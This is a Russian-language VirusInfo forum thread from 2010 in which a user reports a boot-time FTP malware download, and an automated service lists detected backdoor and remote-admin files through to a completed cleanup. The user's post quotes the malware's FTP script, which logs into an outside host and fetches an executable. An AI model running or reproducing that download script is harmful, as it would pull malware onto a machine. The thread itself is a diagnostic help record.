Показано с 1 по 6 из 6.

При загрузке системы загружается вирус с интернета. (заявка №30803)

  1. #1
    Cybernetic Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    29.12.2008
    Сообщений
    48,318
    Вес репутации
    954

    При загрузке системы загружается вирус с интернета. (заявка №30803)

    Пользователь обратился в сервис 911, указав на следующие проблемы в работе его компьютера:
    При загрузке появляется окно cmd, который грузит вирус с какого-то FTP. Удаляется вирус только перезагрузкой, но в момент перезагрузки снова загружается и т.д. В папке C:\Documents and Settings\Админ создается файл cmd.txt с текстом

    open shadao.3322.org
    test
    test
    binary
    get 1.exe
    bye

    при его удалении создается снова. откуда он загружается я не нашел. Заранее спасибо.
    Дата обращения: 01.10.2010 9:05:34
    Номер заявки: 30803

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Cybernetic Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    29.12.2008
    Сообщений
    48,318
    Вес репутации
    954

    04.10.2010 10:10:06 на зараженном компьютере были обнаружены следующие вредоносные файлы:
    1. C:\windows\system32\cmd.exe - подозрительный, обрабатывается вирлабом
      • размер: 396288 байт
      • дата файла: 14.04.2008 20:10:52
      • версия: "5.1.2600.5512 (xpsp.080413-2111)"
      • копирайты: "© Корпорация Майкрософт. Все права защищены."


  4. #3
    Cybernetic Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    29.12.2008
    Сообщений
    48,318
    Вес репутации
    954

    04.10.2010 13:50:11 на зараженном компьютере были обнаружены следующие вредоносные файлы:
    1. C:\windows\system32\cmd.exe - подозрительный, обрабатывается вирлабом
      • размер: 396288 байт
      • дата файла: 14.04.2008 20:10:52
      • версия: "5.1.2600.5512 (xpsp.080413-2111)"
      • копирайты: "© Корпорация Майкрософт. Все права защищены."


  5. #4
    Cybernetic Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    29.12.2008
    Сообщений
    48,318
    Вес репутации
    954

    not-a-virus:RemoteAdmin.Win32.RAdmin.20

    04.10.2010 20:20:09 на зараженном компьютере были обнаружены следующие вредоносные файлы:
    1. C:\windows\system32\cmd.exe - подозрительный, обрабатывается вирлабом
      • размер: 396288 байт
      • дата файла: 14.04.2008 20:10:52
      • версия: "5.1.2600.5512 (xpsp.080413-2111)"
      • копирайты: "© Корпорация Майкрософт. Все права защищены."
    2. C:\Program Files\TMeter\trafmonitor.exe - подозрительный, обрабатывается вирлабом
      • размер: 212992 байт
      • дата файла: 27.01.2010 11:44:48
      • версия: "10,0,553,0"
      • копирайты: "Copyright (c) 2010"
    3. C:\Program Files\TMeter\TrafSvc.exe - подозрительный, обрабатывается вирлабом
      • размер: 430080 байт
      • дата файла: 27.01.2010 11:44:24
      • версия: "10, 0, 553, 0"
      • копирайты: "Copyright (c) 2010 Alexey Kazakovsky"
    4. C:\WINDOWS\system32\DrvMon.exe - подозрительный, обрабатывается вирлабом
      • размер: 53248 байт
      • дата файла: 16.10.2008 6:14:00
      • версия: "1, 0, 1, 2"
      • копирайты: "Copyright c 2003 Alcor Micro, Corp."
    5. C:\WINDOWS\system32\ADMDLL.dll - not-a-virus:RemoteAdmin.Win32.RAdmin.20
      • размер: 90112 байт
      • дата файла: 05.12.2001 13:27:56
      • детект других антивирусов: DrWEB 5.0: Зловред Program.RemoteAdmin.349


  6. #5
    Cybernetic Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    29.12.2008
    Сообщений
    48,318
    Вес репутации
    954

    07.10.2010 21:20:27 на зараженном компьютере были обнаружены следующие вредоносные файлы:
    1. C:\WINDOWS\system32\muicon.exe - подозрительный, обрабатывается вирлабом
      • размер: 287256 байт
      • дата файла: 30.04.2010 7:58:34
      • детект других антивирусов: VBA32: Зловред Backdoor.Hupigon.lsou; BitDefender: Зловред Backdoor.Generic.343439; Avast4: Зловред Win32:Malware-gen
    2. C:\Documents and Settings\Админ\scvhost.exe - подозрительный, обрабатывается вирлабом
      • размер: 2781 байт
      • дата файла: 19.12.2008 14:58:14
    3. C:\WINDOWS\system32\muicon.exe - подозрительный, обрабатывается вирлабом
      • размер: 287256 байт
      • детект других антивирусов: VBA32: Зловред Backdoor.Hupigon.lsou; BitDefender: Зловред Backdoor.Generic.343439; Avast4: Зловред Win32:Malware-gen
    4. C:\RECYCLER\recyl.exe - подозрительный, обрабатывается вирлабом
      • размер: 396288 байт
      • версия: "5.1.2600.5512 (xpsp.080413-2111)"
      • копирайты: "© Корпорация Майкрософт. Все права защищены."
    5. C:\WINDOWS\system32\p.exe - подозрительный, обрабатывается вирлабом
      • размер: 45056 байт
      • версия: "5.1.2600.5512 (xpsp.080413-0852)"
      • копирайты: "© Корпорация Майкрософт. Все права защищены."
    6. C:\Documents and Settings\Админ\scvhost.exe - подозрительный, обрабатывается вирлабом
      • размер: 2781 байт
    7. C:\WINDOWS\system32\muicon.exe - подозрительный, обрабатывается вирлабом
      • размер: 287256 байт
      • детект других антивирусов: VBA32: Зловред Backdoor.Hupigon.lsou; BitDefender: Зловред Backdoor.Generic.343439; Avast4: Зловред Win32:Malware-gen
    8. C:\WINDOWS\system32\muicon.exe - подозрительный, обрабатывается вирлабом
      • размер: 287256 байт
      • детект других антивирусов: VBA32: Зловред Backdoor.Hupigon.lsou; BitDefender: Зловред Backdoor.Generic.343439; Avast4: Зловред Win32:Malware-gen
    9. C:\RECYCLER\recyl.exe - подозрительный, обрабатывается вирлабом
      • размер: 396288 байт
      • версия: "5.1.2600.5512 (xpsp.080413-2111)"
      • копирайты: "© Корпорация Майкрософт. Все права защищены."
    10. C:\RECYCLER\recyl.exe - подозрительный, обрабатывается вирлабом
      • размер: 396288 байт
      • версия: "5.1.2600.5512 (xpsp.080413-2111)"
      • копирайты: "© Корпорация Майкрософт. Все права защищены."
    11. C:\WINDOWS\system32\p.exe - подозрительный, обрабатывается вирлабом
      • размер: 45056 байт
      • версия: "5.1.2600.5512 (xpsp.080413-0852)"
      • копирайты: "© Корпорация Майкрософт. Все права защищены."
    12. C:\WINDOWS\system32\p.exe - подозрительный, обрабатывается вирлабом
      • размер: 45056 байт
      • версия: "5.1.2600.5512 (xpsp.080413-0852)"
      • копирайты: "© Корпорация Майкрософт. Все права защищены."
    13. C:\Documents and Settings\Админ\scvhost.exe - подозрительный, обрабатывается вирлабом
      • размер: 2781 байт
    14. C:\Documents and Settings\Админ\scvhost.exe - подозрительный, обрабатывается вирлабом
      • размер: 2781 байт


  7. #6
    Cybernetic Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    29.12.2008
    Сообщений
    48,318
    Вес репутации
    954

    Итог лечения

    13.10.2010 9:42:41 лечение успешно завершено

Похожие темы

  1. При загрузке системы Avast постоянно блокирует вирус URL:MAL
    От Константин Акименко в разделе Помогите!
    Ответов: 4
    Последнее сообщение: 05.07.2012, 08:12
  2. При загрузке системы открываются мои документы (заявка №48467)
    От CyberHelper в разделе Отчеты сервиса лечения VirusInfo
    Ответов: 2
    Последнее сообщение: 17.01.2011, 15:01
  3. При загрузке системы выходит баннер якобы от Adult.com (заявка №44449)
    От CyberHelper в разделе Отчеты сервиса лечения VirusInfo
    Ответов: 2
    Последнее сообщение: 27.12.2010, 18:00
  4. Ответов: 1
    Последнее сообщение: 11.06.2010, 02:00
  5. Йа вирус при загрузке системы
    От Krasavka в разделе Помогите!
    Ответов: 8
    Последнее сообщение: 22.02.2009, 05:39

Свернуть/Развернуть Ваши права в разделе

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Page generated in 0.01337 seconds with 16 queries